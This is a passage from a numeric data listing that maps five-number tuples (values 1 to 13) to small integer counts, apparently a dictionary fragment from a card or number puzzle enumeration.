(1, 3, 8, 10, 11): 8,
(1, 3, 8, 10, 12): 11,
(1, 3, 8, 10, 13): 13,
(1, 3, 8, 11, 11): 4,
(1, 3, 8, 11, 12): 11,
(1, 3, 8, 11, 13): 5,
(1, 3, 8, 12, 12): 4,
(1, 3, 8, 12, 13): 7,
(1, 3, 8, 13, 13): 2,
(1, 3, 9, 9, 9): 2,
(1, 3, 9, 9, 10): 4,
(1, 3, 9, 9, 11): 4,
(1, 3, 9, 9, 12): 10,
(1, 3, 9, 9, 13): 7,
(1, 3, 9, 10, 10): 1,
(1, 3, 9, 10, 11): 9,
(1, 3, 9, 10, 12): 14,
(1, 3, 9, 10, 13): 11,
(1, 3, 9, 11, 11): 4,
(1, 3, 9, 11, 12): 12,
(1, 3, 9, 11, 13): 7,
(1, 3, 9, 12, 12): 6,
(1, 3, 9, 12, 13): 8,
(1, 3, 9, 13, 13): 2,
(1, 3, 10, 10, 11): 2,
(1, 3, 10, 10, 12): 5,
(1, 3, 10, 10, 13): 3,
(1, 3, 10, 11, 11): 2,
(1, 3, 10, 11, 12): 8,
(1, 3, 10, 11, 13): 6,
(1, 3, 10, 12, 12): 7,
(1, 3, 10, 12, 13): 8,
(1, 3, 10, 13, 13): 4,
(1, 3, 11, 11, 12): 1,
(1, 3, 11, 11, 13): 3,
(1, 3, 11, 12, 12): 1,
(1, 3, 11, 12, 13): 4,
(1, 3, 11, 13, 13): 3,
(1, 3, 12, 12, 12): 1,
(1, 3, 12, 12, 13): 2,
(1, 3, 12, 13, 13): 4,
(1, 3, 13, 13, 13): 2,
(1, 4, 4, 4, 5): 1,
(1, 4, 4, 4, 6): 3,
(1, 4, 4, 4, 7): 1,
(1, 4, 4, 4, 8): 1,
(1, 4, 4, 4, 9): 1,
(1, 4, 4, 4, 10): 4,
(1, 4, 4, 4, 11): 2,
(1, 4, 4, 4, 13): 1,
(1, 4, 4, 5, 5): 4,
(1, 4, 4, 5, 6): 10,
(1, 4, 4, 5, 7): 5,
(1, 4, 4, 5, 8): 7,
(1, 4, 4, 5, 9): 5,
(1, 4, 4, 5, 10): 8,
(1, 4, 4, 5, 11): 4,
(1, 4, 4, 5, 12): 3,
(1, 4, 4, 5, 13): 6,
(1, 4, 4, 6, 6): 4,
(1, 4, 4, 6, 7): 10,
(1, 4, 4, 6, 8): 14,
(1, 4, 4, 6, 9): 8,
(1, 4, 4, 6, 10): 13,
(1, 4, 4, 6, 11): 7,
(1, 4, 4, 6, 12): 13,
(1, 4, 4, 6, 13): 5,
(1, 4, 4, 7, 7): 4,
(1, 4, 4, 7, 8): 7,
(1, 4, 4, 7, 9): 9,
(1, 4, 4, 7, 10): 8,
(1, 4, 4, 7, 11): 9,
(1, 4, 4, 7, 12): 6,
(1, 4, 4, 7, 13): 9,
(1, 4, 4, 8, 8): 2,
(1, 4, 4, 8, 9): 5,
(1, 4, 4, 8, 10): 12,
(1, 4, 4, 8, 11): 6,
(1, 4, 4, 8, 12): 6,
(1, 4, 4, 8, 13): 6,
(1, 4, 4, 9, 9): 4,
(1, 4, 4, 9, 10): 6,
(1, 4, 4, 9, 11): 7,
(1, 4, 4, 9, 12): 8,
(1, 4, 4, 9, 13): 4,
(1, 4, 4, 10, 10): 5,
(1, 4, 4, 10, 11): 7,
(1, 4, 4, 10, 12): 10,
(1, 4, 4, 10, 13): 5,
(1, 4, 4, 11, 11): 2,
(1, 4, 4, 11, 12): 5,
(1, 4, 4, 11, 13): 4,
(1, 4, 4, 12, 13): 4,
(1, 4, 4, 13, 13): 4,
(1, 4, 5, 5, 5): 1,
(1, 4, 5, 5, 6): 5,
(1, 4, 5, 5, 7): 6,
(1, 4, 5, 5, 8): 11,
(1, 4, 5, 5, 9): 3,
(1, 4, 5, 5, 10): 4,
(1, 4, 5, 5, 11): 3,
(1, 4, 5, 5, 12): 7,
(1, 4, 5, 5, 13): 6,
(1, 4, 5, 6, 6): 5,
(1, 4, 5, 6, 7): 11,
(1, 4, 5, 6, 8): 12,
(1, 4, 5, 6, 9): 18,
(1, 4, 5, 6, 10): 13,
(1, 4, 5, 6, 11): 11,
(1, 4, 5, 6, 12): 18,
(1, 4, 5, 6, 13): 14,
(1, 4, 5, 7, 7): 6,
(1, 4, 5, 7, 8): 16,
(1, 4, 5, 7, 9): 10,
(1, 4, 5, 7, 10): 21,
(1, 4, 5, 7, 11): 7,
(1, 4, 5, 7, 12): 15,
(1, 4, 5, 7, 13): 8,
(1, 4, 5, 8, 8): 2,
(1, 4, 5, 8, 9): 15,
(1, 4, 5, 8, 10): 23,
(1, 4, 5, 8, 11): 15,
(1, 4, 5, 8, 12): 10,
(1, 4, 5, 8, 13): 9,
(1, 4, 5, 9, 9): 6,
(1, 4, 5, 9, 10): 15,
(1, 4, 5, 9, 11): 9,
(1, 4, 5, 9, 12): 15,
(1, 4, 5, 9, 13): 8,
(1, 4, 5, 10, 10): 6,
(1, 4, 5, 10, 11): 17,
(1, 4, 5, 10, 12): 23,
(1, 4, 5, 10, 13): 11,
(1, 4, 5, 11, 11): 6,
(1, 4, 5, 11, 12): 13,
(1, 4, 5, 11, 13): 7,
(1, 4, 5, 12, 12): 3,
(1, 4, 5, 12, 13): 7,
(1, 4, 5, 13, 13): 2,
(1, 4, 6, 6, 6): 3,
(1, 4, 6, 6, 7): 4,
(1, 4, 6, 6, 8): 11,
(1, 4, 6, 6, 9): 6,
(1, 4, 6, 6, 10): 8,
(1, 4, 6, 6, 11): 6,
(1, 4, 6, 6, 12): 9,
(1, 4, 6, 6, 13): 6,
(1, 4, 6, 7, 7): 6,
(1, 4, 6, 7, 8): 9,
(1, 4, 6, 7, 9): 17,
(1, 4, 6, 7, 10): 18,
(1, 4, 6, 7, 11): 19,
(1, 4, 6, 7, 12): 19,
(1, 4, 6, 7, 13): 10,
(1, 4, 6, 8, 8): 12,
(1, 4, 6, 8, 9): 15,
(1, 4, 6, 8, 10): 18,
(1, 4, 6, 8, 11): 14,
(1, 4, 6, 8, 12): 19,
(1, 4, 6, 8, 13): 9,
(1, 4, 6, 9, 9): 7,
(1, 4, 6, 9, 10): 16,
(1, 4, 6, 9, 11): 15,
(1, 4, 6, 9, 12): 22,
(1, 4, 6, 9, 13): 11,
(1, 4, 6, 10, 10): 5,
(1, 4, 6, 10, 11): 10,
(1, 4, 6, 10, 12): 25,
(1, 4, 6, 10, 13): 9,
(1, 4, 6, 11, 11): 6,
(1, 4, 6, 11, 12): 16,
(1, 4, 6, 11, 13): 12,
(1, 4, 6, 12, 12): 17,
(1, 4, 6, 12, 13): 10,
(1, 4, 6, 13, 13): 3,
(1, 4, 7, 7, 7): 3,
(1, 4, 7, 7, 8): 11,
(1, 4, 7, 7, 9): 7,
(1, 4, 7, 7, 10): 8,
(1, 4, 7, 7, 11): 7,
(1, 4, 7, 7, 12): 7,
(1, 4, 7, 7, 13): 6,
(1, 4, 7, 8, 8): 4,
(1, 4, 7, 8, 9): 14,
(1, 4, 7, 8, 10): 21,
(1, 4, 7, 8, 11): 12,
(1, 4, 7, 8, 12): 10,
(1, 4, 7, 8, 13): 9,
(1, 4, 7, 9, 9): 8,
(1, 4, 7, 9, 10): 12,
(1, 4, 7, 9, 11): 10,
(1, 4, 7, 9, 12): 21,
(1, 4, 7, 9, 13): 5,
(1, 4, 7, 10, 10): 6,
(1, 4, 7, 10, 11): 10,
(1, 4, 7, 10, 12): 12,
(1, 4, 7, 10, 13): 13,
(1, 4, 7, 11, 11): 1,
(1, 4, 7, 11, 12): 9,
(1, 4, 7, 11, 13): 7,
(1, 4, 7, 12, 12): 7,
(1, 4, 7, 12, 13): 12,
(1, 4, 7, 13, 13): 2,
(1, 4, 8, 8, 8): 1,
(1, 4, 8, 8, 9): 3,
(1, 4, 8, 8, 10): 7,
(1, 4, 8, 8, 11): 4,
(1, 4, 8, 8, 12): 5,
(1, 4, 8, 8, 13): 5,
(1, 4, 8, 9, 9): 3,
(1, 4, 8, 9, 10): 11,
(1, 4, 8, 9, 11): 13,
(1, 4, 8, 9, 12): 6,
(1, 4, 8, 9, 13): 9,
(1, 4, 8, 10, 10): 7,
(1, 4, 8, 10, 11): 7,
(1, 4, 8, 10, 12): 22,
(1, 4, 8, 10, 13): 4,
(1, 4, 8, 11, 11): 4,
(1, 4, 8, 11, 12): 4,
(1, 4, 8, 11, 13): 9,
(1, 4, 8, 12, 12): 3,
(1, 4, 8, 12, 13): 8,
(1, 4, 8, 13, 13): 1,
(1, 4, 9, 9, 10): 3,
(1, 4, 9, 9, 11): 3,
(1, 4, 9, 9, 12): 10,
(1, 4, 9, 9, 13): 4,
(1, 4, 9, 10, 10): 1,
(1, 4, 9, 10, 11): 9,
(1, 4, 9, 10, 12): 11,
(1, 4, 9, 10, 13): 9,
(1, 4, 9, 11, 11): 4,
(1, 4, 9, 11, 12): 12,
(1, 4, 9, 11, 13): 3,
(1, 4, 9, 12, 12): 4,
(1, 4, 9, 12, 13): 5,
(1, 4, 9, 13, 13): 2,
(1, 4, 10, 10, 10): 1,
(1, 4, 10, 10, 11): 3,
(1, 4, 10, 10, 12): 7,
(1, 4, 10, 10, 13): 4,
(1, 4, 10, 11, 11): 2,
(1, 4, 10, 11, 12): 9,
(1, 4, 10, 11, 13): 9,
(1, 4, 10, 12, 12): 5,
(1, 4, 10, 12, 13): 8,
(1, 4, 10, 13, 13): 3,
(1, 4, 11, 11, 11): 1,
(1, 4, 11, 11, 12): 2,
(1, 4, 11, 11, 13): 5,
(1, 4, 11, 12, 12): 3,
(1, 4, 11, 12, 13): 8,
(1, 4, 11, 13, 13): 3,
(1, 4, 12, 12, 12): 1,
(1, 4, 12, 12, 13): 3,
(1, 4, 12, 13, 13): 5,
(1, 4, 13, 13, 13): 3,
(1, 5, 5, 5, 6): 2,
(1, 5, 5, 5, 7): 3,
(1, 5, 5, 5, 8): 4,
(1, 5, 5, 5, 9): 1,
(1, 5, 5, 5, 10): 2,
(1, 5, 5, 5, 11): 1,
(1, 5, 5, 5, 12): 1,
(1, 5, 5, 5, 13): 3,
(1, 5, 5, 6, 6): 4,
(1, 5, 5, 6, 7): 5,
(1, 5, 5, 6, 8): 7,
(1, 5, 5, 6, 9): 2,
(1, 5, 5, 6, 10): 3,
(1, 5, 5, 6, 11): 7,
(1, 5, 5, 6, 12): 13,
(1, 5, 5, 6, 13): 6,
(1, 5, 5, 7, 7): 3,
(1, 5, 5, 7, 8): 4,
(1, 5, 5, 7, 9): 7,
(1, 5, 5, 7, 10): 6,
(1, 5, 5, 7, 11): 7,
(1, 5, 5, 7, 12): 5,
(1, 5, 5, 7, 13): 4,
(1, 5, 5, 8, 8): 5,
(1, 5, 5, 8, 9): 7,
(1, 5, 5, 8, 10): 7,
(1, 5, 5, 8, 11): 4,
(1, 5, 5, 8, 12): 5,
(1, 5, 5, 8, 13): 1,
(1, 5, 5, 9, 9): 4,
(1, 5, 5, 9, 10): 8,
(1, 5, 5, 9, 11): 3,
(1, 5, 5, 9, 12): 6,
(1, 5, 5, 9, 13): 2,
(1, 5, 5, 10, 10): 2,
(1, 5, 5, 10, 11): 4,
(1, 5, 5, 10, 12): 8,
(1, 5, 5, 10, 13): 5,
(1, 5, 5, 11, 11): 3,
(1, 5, 5, 11, 12): 4,
(1, 5, 5, 11, 13): 4,
(1, 5, 5, 12, 12): 4,
(1, 5, 5, 12, 13): 1,
(1, 5, 5, 13, 13): 2,
(1, 5, 6, 6, 6): 5,
(1, 5, 6, 6, 7): 8,
(1, 5, 6, 6, 8): 3,
(1, 5, 6, 6, 9): 3,
(1, 5, 6, 6, 10): 4,
(1, 5, 6, 6, 11): 5,
(1, 5, 6, 6, 12): 9,
(1, 5, 6, 6, 13): 8,
(1, 5, 6, 7, 7): 8,
(1, 5, 6, 7, 8): 13,
(1, 5, 6, 7, 9): 4,
(1, 5, 6, 7, 10): 10,
(1, 5, 6, 7, 11): 13,
(1, 5, 6, 7, 12): 24,
(1, 5, 6, 7, 13): 11,
(1, 5, 6, 8, 8): 6,
(1, 5, 6, 8, 9): 22,
(1, 5, 6, 8, 10): 18,
(1, 5, 6, 8, 11): 9,
(1, 5, 6, 8, 12): 11,
(1, 5, 6, 8, 13): 7,
(1, 5, 6, 9, 9): 14,
(1, 5, 6, 9, 10): 13,
(1, 5, 6, 9, 11): 8,
(1, 5, 6, 9, 12): 16,
(1, 5, 6, 9, 13): 5,
(1, 5, 6, 10, 10): 7,
(1, 5, 6, 10, 11): 5,
(1, 5, 6, 10, 12): 15,
(1, 5, 6, 10, 13): 8,
(1, 5, 6, 11, 11): 2,
(1, 5, 6, 11, 12): 15,
(1, 5, 6, 11, 13): 7,
(1, 5, 6, 12, 12): 9,
(1, 5, 6, 12, 13): 14,
(1, 5, 6, 13, 13): 3,
(1, 5, 7, 7, 7): 2,
(1, 5, 7, 7, 8): 5,
(1, 5, 7, 7, 9): 8,
(1, 5, 7, 7, 10): 5,
(1, 5, 7, 7, 11): 5,
(1, 5, 7, 7, 12): 4,
(1, 5, 7, 7, 13): 7,
(1, 5, 7, 8, 8): 6,
(1, 5, 7, 8, 9): 7,
(1, 5, 7, 8, 10): 11,
(1, 5, 7, 8, 11): 7,
(1, 5, 7, 8, 12): 10,
(1, 5, 7, 8, 13): 5,
(1, 5, 7, 9, 9): 6,
(1, 5, 7, 9, 10): 12,
(1, 5, 7, 9, 11): 10,
(1, 5, 7, 9, 12): 8,
(1, 5, 7, 9, 13): 4,
(1, 5, 7, 10, 10): 6,
(1, 5, 7, 10, 11): 5,
(1, 5, 7, 10, 12): 12,
(1, 5, 7, 10, 13): 7,
(1, 5, 7, 11, 11): 4,
(1, 5, 7, 11, 12): 5,
(1, 5, 7, 11, 13): 9,
(1, 5, 7, 12, 12): 8,
(1, 5, 7, 12, 13): 5,
(1, 5, 7, 13, 13): 4,
(1, 5, 8, 8, 8): 2,
(1, 5, 8, 8, 9): 4,
(1, 5, 8, 8, 10): 5,
(1, 5, 8, 8, 11): 5,
(1, 5, 8, 8, 12): 1,
(1, 5, 8, 8, 13): 2,
(1, 5, 8, 9, 9): 4,
(1, 5, 8, 9, 10): 15,
(1, 5, 8, 9, 11): 8,
(1, 5, 8, 9, 12): 17,
(1, 5, 8, 9, 13): 3,
(1, 5, 8, 10, 10): 5,
(1, 5, 8, 10, 11): 16,
(1, 5, 8, 10, 12): 9,
(1, 5, 8, 10, 13): 9,
(1, 5, 8, 11, 11): 3,
(1, 5, 8, 11, 12): 10,
(1, 5, 8, 11, 13): 3,
(1, 5, 8, 12, 12): 5,
(1, 5, 8, 12, 13): 10,
(1, 5, 8, 13, 13): 3,
(1, 5, 9, 9, 10): 2,
(1, 5, 9, 9, 11): 7,
(1, 5, 9, 9, 12): 6,
(1, 5, 9, 9, 13): 5,
(1, 5, 9, 10, 10): 2,
(1, 5, 9, 10, 11): 5,
(1, 5, 9, 10, 12): 16,
(1, 5, 9, 10, 13): 6,
(1, 5, 9, 11, 11): 2,
(1, 5, 9, 11, 12): 6,
(1, 5, 9, 11, 13): 8,
(1, 5, 9, 12, 12): 5,
(1, 5, 9, 12, 13): 4,
(1, 5, 9, 13, 13): 2,
(1, 5, 10, 10, 10): 1,
(1, 5, 10, 10, 11): 3,
(1, 5, 10, 10, 12): 3,
(1, 5, 10, 10, 13): 5,
(1, 5, 10, 11, 11): 2,
(1, 5, 10, 11, 12): 4,
(1, 5, 10, 11, 13): 5,
(1, 5, 10, 12, 12): 3,
(1, 5, 10, 12, 13): 6,
(1, 5, 10, 13, 13): 3,
(1, 5, 11, 11, 12): 1,
(1, 5, 11, 11, 13): 3,
(1, 5, 11, 12, 12): 2,
(1, 5, 11, 12, 13): 7,
(1, 5, 11, 13, 13): 4,
(1, 5, 12, 12, 12): 1,
(1, 5, 12, 12, 13): 4,
(1, 5, 12, 13, 13): 1,
(1, 6, 6, 6, 6): 1,
(1, 6, 6, 6, 7): 2,
(1, 6, 6, 6, 8): 1,
(1, 6, 6, 6, 9): 1,
(1, 6, 6, 6, 10): 1,
(1, 6, 6, 6, 11): 2,
(1, 6, 6, 6, 12): 2,
(1, 6, 6, 6, 13): 3,
(1, 6, 6, 7, 7): 1,
(1, 6, 6, 7, 8): 8,
(1, 6, 6, 7, 9): 6,
(1, 6, 6, 7, 10): 1,
(1, 6, 6, 7, 11): 5,
(1, 6, 6, 7, 12): 13,
(1, 6, 6, 7, 13): 12,
(1, 6, 6, 8, 8): 5,
(1, 6, 6, 8, 9): 9,
(1, 6, 6, 8, 10): 4,
(1, 6, 6, 8, 11): 2,
(1, 6, 6, 8, 12): 11,
(1, 6, 6, 8, 13): 7,
(1, 6, 6, 9, 9): 5,
(1, 6, 6, 9, 10): 5,
(1, 6, 6, 9, 11): 4,
(1, 6, 6, 9, 12): 9,
(1, 6, 6, 9, 13): 3,
(1, 6, 6, 10, 10): 2,
(1, 6, 6, 10, 11): 4,
(1, 6, 6, 10, 12): 8,
(1, 6, 6, 10, 13): 2,
(1, 6, 6, 11, 11): 2,
(1, 6, 6, 11, 12): 4,
(1, 6, 6, 11, 13): 4,
(1, 6, 6, 12, 12): 6,
(1, 6, 6, 12, 13): 4,
(1, 6, 6, 13, 13): 3,
(1, 6, 7, 7, 7): 2,
(1, 6, 7, 7, 8): 9,
(1, 6, 7, 7, 9): 4,
(1, 6, 7, 7, 10): 3,
(1, 6, 7, 7, 11): 1,
(1, 6, 7, 7, 12): 10,
(1, 6, 7, 7, 13): 12,
(1, 6, 7, 8, 8): 4,
(1, 6, 7, 8, 9): 11,
(1, 6, 7, 8, 10): 4,
(1, 6, 7, 8, 11): 8,
(1, 6, 7, 8, 12): 11,
(1, 6, 7, 8, 13): 13,
(1, 6, 7, 9, 9): 2,
(1, 6, 7, 9, 10): 10,
(1, 6, 7, 9, 11): 3,
(1, 6, 7, 9, 12): 16,
(1, 6, 7, 9, 13): 5,
(1, 6, 7, 10, 10): 4,
(1, 6, 7, 10, 11): 8,
(1, 6, 7, 10, 12): 10,
(1, 6, 7, 10, 13): 4,
(1, 6, 7, 11, 11): 4,
(1, 6, 7, 11, 12): 10,
(1, 6, 7, 11, 13): 4,
(1, 6, 7, 12, 12): 5,
(1, 6, 7, 12, 13): 10,
(1, 6, 7, 13, 13): 3,
(1, 6, 8, 8, 8): 2,
(1, 6, 8, 8, 9): 3,
(1, 6, 8, 8, 10): 7,
(1, 6, 8, 8, 11): 1,
(1, 6, 8, 8, 12): 8,
(1, 6, 8, 8, 13): 3,
(1, 6, 8, 9, 9): 3,
(1, 6, 8, 9, 10): 7,
(1, 6, 8, 9, 11): 17,
(1, 6, 8, 9, 12): 12,
(1, 6, 8, 9, 13): 9,
(1, 6, 8, 10, 10): 6,
(1, 6, 8, 10, 11): 7,
(1, 6, 8, 10, 12): 20,
(1, 6, 8, 10, 13): 6,
(1, 6, 8, 11, 11): 4,
(1, 6, 8, 11, 12): 6,
(1, 6, 8, 11, 13): 9,
(1, 6, 8, 12, 12): 9,
(1, 6, 8, 12, 13): 6,
(1, 6, 8, 13, 13): 5,
(1, 6, 9, 9, 9): 2,
(1, 6, 9, 9, 10): 4,
(1, 6, 9, 9, 11): 6,
(1, 6, 9, 9, 12): 13,
(1, 6, 9, 9, 13): 5,
(1, 6, 9, 10, 10): 3,
(1, 6, 9, 10, 11): 8,
(1, 6, 9, 10, 12): 9,
(1, 6, 9, 10, 13): 10,
(1, 6, 9, 11, 11): 3,
(1, 6, 9, 11, 12): 12,
(1, 6, 9, 11, 13): 5,
(1, 6, 9, 12, 12): 12,
(1, 6, 9, 12, 13): 12,
(1, 6, 9, 13, 13): 3,
(1, 6, 10, 10, 11): 1,
(1, 6, 10, 10, 12): 6,
(1, 6, 10, 10, 13): 2,
(1, 6, 10, 11, 11): 1,
(1, 6, 10, 11, 12): 3,
(1, 6, 10, 11, 13): 11,
(1, 6, 10, 12, 12): 10,
(1, 6, 10, 12, 13): 7,
(1, 6, 10, 13, 13): 6,
(1, 6, 11, 11, 12): 4,
(1, 6, 11, 11, 13): 4,
(1, 6, 11, 12, 12): 2,
(1, 6, 11, 12, 13): 10,
(1, 6, 11, 13, 13): 2,
(1, 6, 12, 12, 12): 2,
(1, 6, 12, 12, 13): 1,
(1, 7, 7, 7, 7): 1,
(1, 7, 7, 7, 8): 4,
(1, 7, 7, 7, 9): 3,
(1, 7, 7, 7, 10): 1,
(1, 7, 7, 7, 11): 2,
(1, 7, 7, 7, 12): 3,
(1, 7, 7, 7, 13): 3,
(1, 7, 7, 8, 8): 4,
(1, 7, 7, 8, 9): 1,
(1, 7, 7, 8, 10): 4,
(1, 7, 7, 8, 11): 1,
(1, 7, 7, 8, 12): 7,
(1, 7, 7, 8, 13): 7,
(1, 7, 7, 9, 9): 1,
(1, 7, 7, 9, 10): 3,
(1, 7, 7, 9, 11): 5,
(1, 7, 7, 9, 12): 5,
(1, 7, 7, 9, 13): 5,
(1, 7, 7, 10, 10): 1,
(1, 7, 7, 10, 11): 5,
(1, 7, 7, 10, 12): 7,
(1, 7, 7, 10, 13): 1,
(1, 7, 7, 11, 11): 1,
(1, 7, 7, 11, 12): 2,
(1, 7, 7, 11, 13): 5,
(1, 7, 7, 12, 12): 3,
(1, 7, 7, 12, 13): 2,
(1, 7, 7, 13, 13): 3,
(1, 7, 8, 8, 8): 2,
(1, 7, 8, 8, 9): 3,
(1, 7, 8, 8, 10): 1,
(1, 7, 8, 8, 11): 2,
(1, 7, 8, 8, 12): 2,
(1, 7, 8, 8, 13): 5,
(1, 7, 8, 9, 9): 2,
(1, 7, 8, 9, 10): 5,
(1, 7, 8, 9, 11): 4,
(1, 7, 8, 9, 12): 14,
(1, 7, 8, 9, 13): 6,
(1, 7, 8, 10, 10): 6,
(1, 7, 8, 10, 11): 9,
(1, 7, 8, 10, 12): 8,
(1, 7, 8, 10, 13): 9,
(1, 7, 8, 11, 11): 4,
(1, 7, 8, 11, 12): 6,
(1, 7, 8, 11, 13): 1,
(1, 7, 8, 12, 12): 4,
(1, 7, 8, 12, 13): 10,
(1, 7, 8, 13, 13): 4,
(1, 7, 9, 9, 10): 2,
(1, 7, 9, 9, 11): 5,
(1, 7, 9, 9, 12): 6,
(1, 7, 9, 9, 13): 4,
(1, 7, 9, 10, 10): 3,
(1, 7, 9, 10, 11): 6,
(1, 7, 9, 10, 12): 12,
(1, 7, 9, 10, 13): 3,
(1, 7, 9, 11, 11): 4,
(1, 7, 9, 11, 12): 5,
(1, 7, 9, 11, 13): 6,
(1, 7, 9, 12, 12): 5,
(1, 7, 9, 12, 13): 5,
(1, 7, 9, 13, 13): 4,
(1, 7, 10, 10, 11): 4,
(1, 7, 10, 10, 12): 3,
(1, 7, 10, 10, 13): 4,
(1, 7, 10, 11, 12): 9,
(1, 7, 10, 11, 13): 6,
(1, 7, 10, 12, 12): 2,
(1, 7, 10, 12, 13): 10,
(1, 7, 10, 13, 13): 1,
(1, 7, 11, 11, 12): 2,
(1, 7, 11, 11, 13): 6,
(1, 7, 11, 12, 12): 5,
(1, 7, 11, 12, 13): 5,
(1, 7, 11, 13, 13): 4,
(1, 7, 12, 12, 12): 2,
(1, 7, 12, 12, 13): 2,
(1, 7, 12, 13, 13): 1,
(1, 8, 8, 8, 10): 1,
(1, 8, 8, 8, 12): 1,
(1, 8, 8, 8, 13): 2,
(1, 8, 8, 9, 11): 1,
(1, 8, 8, 9, 12): 4,
(1, 8, 8, 9, 13): 4,
(1, 8, 8, 10, 10): 1,
(1, 8, 8, 10, 11): 3,
(1, 8, 8, 10, 12): 6,
(1, 8, 8, 10, 13): 4,
(1, 8, 8, 11, 11): 2,
(1, 8, 8, 11, 12): 2,
(1, 8, 8, 11, 13): 3,
(1, 8, 8, 12, 12): 1,
(1, 8, 8, 12, 13): 2,
(1, 8, 8, 13, 13): 2,
(1, 8, 9, 9, 11): 1,
(1, 8, 9, 9, 12): 3,
(1, 8, 9, 9, 13): 3,
(1, 8, 9, 10, 11): 5,
(1, 8, 9, 10, 12): 7,
(1, 8, 9, 10, 13): 6,
(1, 8, 9, 11, 11): 3,
(1, 8, 9, 11, 12): 9,
(1, 8, 9, 11, 13): 5,
(1, 8, 9, 12, 12): 2,
(1, 8, 9, 12, 13): 4,
(1, 8, 9, 13, 13): 1,
(1, 8, 10, 10, 10): 1,
(1, 8, 10, 10, 11): 1,
(1, 8, 10, 10, 12): 4,
(1, 8, 10, 10, 13): 5,
(1, 8, 10, 11, 11): 5,
(1, 8, 10, 11, 12): 7,
(1, 8, 10, 11, 13): 8,
(1, 8, 10, 12, 12): 6,
(1, 8, 10, 12, 13): 4,
(1, 8, 10, 13, 13): 3,
(1, 8, 11, 11, 11): 1,
(1, 8, 11, 11, 12): 2,
(1, 8, 11, 11, 13): 3,
(1, 8, 11, 12, 12): 1,
(1, 8, 11, 12, 13): 6,
(1, 8, 11, 13, 13): 3,
(1, 8, 12, 12, 12): 1,
(1, 8, 12, 12, 13): 3,
(1, 8, 12, 13, 13): 3,
(1, 8, 13, 13, 13): 1,
(1, 9, 9, 9, 12): 1,
(1, 9, 9, 10, 11): 1,
(1, 9, 9, 10, 12): 2,
(1, 9, 9, 10, 13): 2,
(1, 9, 9, 11, 11): 2,
(1, 9, 9, 11, 12): 6,
(1, 9, 9, 11, 13): 3,
(1, 9, 9, 12, 12): 4,
(1, 9, 9, 12, 13): 2,
(1, 9, 9, 13, 13): 1,
(1, 9, 10, 10, 11): 2,
(1, 9, 10, 10, 12): 3,
(1, 9, 10, 10, 13): 2,
(1, 9, 10, 11, 11): 4,
(1, 9, 10, 11, 12): 10,
(1, 9, 10, 11, 13): 7,
(1, 9, 10, 12, 12): 6,
(1, 9, 10, 12, 13): 11,
(1, 9, 10, 13, 13): 2,
(1, 9, 11, 11, 11): 2,
(1, 9, 11, 11, 12): 3,
(1, 9, 11, 11, 13): 2,
(1, 9, 11, 12, 12): 3,
(1, 9, 11, 12, 13): 3,
(1, 9, 11, 13, 13): 3,
(1, 9, 12, 12, 12): 1,
(1, 9, 12, 12, 13): 1,
(1, 9, 12, 13, 13): 2,
(1, 9, 13, 13, 13): 1,
(1, 10, 10, 10, 11): 2,
(1, 10, 10, 10, 12): 2,
(1, 10, 10, 10, 13): 1,
(1, 10, 10, 11, 11): 2,
(1, 10, 10, 11, 12): 4,
(1, 10, 10, 11, 13): 5,
(1, 10, 10, 12, 12): 2,
(1, 10, 10, 12, 13): 2,
(1, 10, 10, 13, 13): 2,
(1, 10, 11, 11, 11): 2,
(1, 10, 11, 11, 12): 2,
(1, 10, 11, 11, 13): 1,
(1, 10, 11, 12, 12): 1,
(1, 10, 11, 12, 13): 5,
(1, 10, 11, 13, 13): 2,
(1, 10, 12, 12, 13): 1,
(1, 11, 11, 11, 13): 1,
(2, 2, 2, 2, 5): 4,
(2, 2, 2, 2, 7): 3,
(2, 2, 2, 2, 8): 2,
(2, 2, 2, 2, 9): 5,
(2, 2, 2, 2, 10): 2,
(2, 2, 2, 2, 11): 2,
(2, 2, 2, 2, 12): 4,
(2, 2, 2, 2, 13): 4,
(2, 2, 2, 3, 3): 4,
(2, 2, 2, 3, 4): 8,
(2, 2, 2, 3, 5): 3,
(2, 2, 2, 3, 6): 10,
(2, 2, 2, 3, 7): 7,
(2, 2, 2, 3, 8): 10,
(2, 2, 2, 3, 9): 9,
(2, 2, 2, 3, 10): 10,
(2, 2, 2, 3, 11): 9,
(2, 2, 2, 3, 12): 12,
(2, 2, 2, 3, 13): 8,
(2, 2, 2, 4, 4): 1,
(2, 2, 2, 4, 5): 7,
(2, 2, 2, 4, 6): 9,
(2, 2, 2, 4, 7): 12,
(2, 2, 2, 4, 8): 3,
(2, 2, 2, 4, 9): 8,
(2, 2, 2, 4, 10): 18,
(2, 2, 2, 4, 11): 19,
(2, 2, 2, 4, 12): 13,
(2, 2, 2, 4, 13): 8,
(2, 2, 2, 5, 5): 6,
(2, 2, 2, 5, 6): 8,
(2, 2, 2, 5, 7): 8,
(2, 2, 2, 5, 8): 8,
(2, 2, 2, 5, 9): 7,
(2, 2, 2, 5, 10): 10,
(2, 2, 2, 5, 11): 5,
(2, 2, 2, 5, 12): 13,
(2, 2, 2, 5, 13): 6,
(2, 2, 2, 6, 6): 10,
(2, 2, 2, 6, 7): 10,
(2, 2, 2, 6, 8): 15,
(2, 2, 2, 6, 9): 9,
(2, 2, 2, 6, 10): 10,
(2, 2, 2, 6, 11): 8,
(2, 2, 2, 6, 12): 9,
(2, 2, 2, 6, 13): 12,
(2, 2, 2, 7, 7): 9,
(2, 2, 2, 7, 8): 8,
(2, 2, 2, 7, 9): 4,
(2, 2, 2, 7, 10): 7,
(2, 2, 2, 7, 11): 3,
(2, 2, 2, 7, 12): 12,
(2, 2, 2, 7, 13): 4,
(2, 2, 2, 8, 8): 4,
(2, 2, 2, 8, 9): 9,
(2, 2, 2, 8, 10): 7,
(2, 2, 2, 8, 11): 10,
(2, 2, 2, 8, 12): 10,
(2, 2, 2, 8, 13): 10,
(2, 2, 2, 9, 9): 1,
(2, 2, 2, 9, 10): 7,
(2, 2, 2, 9, 11): 3,
(2, 2, 2, 9, 12): 9,
(2, 2, 2, 9, 13): 3,
(2, 2, 2, 10, 10): 6,
(2, 2, 2, 10, 11): 7,
(2, 2, 2, 10, 12): 9,
(2, 2, 2, 10, 13): 4,
(2, 2, 2, 11, 11): 3,
(2, 2, 2, 11, 12): 7,
(2, 2, 2, 11, 13): 1,
(2, 2, 2, 12, 12): 6,
(2, 2, 2, 12, 13): 7,
(2, 2, 3, 3, 3): 5,
(2, 2, 3, 3, 4): 7,
(2, 2, 3, 3, 5): 6,
(2, 2, 3, 3, 6): 16,
(2, 2, 3, 3, 7): 9,
(2, 2, 3, 3, 8): 7,
(2, 2, 3, 3, 9): 12,
(2, 2, 3, 3, 10): 11,
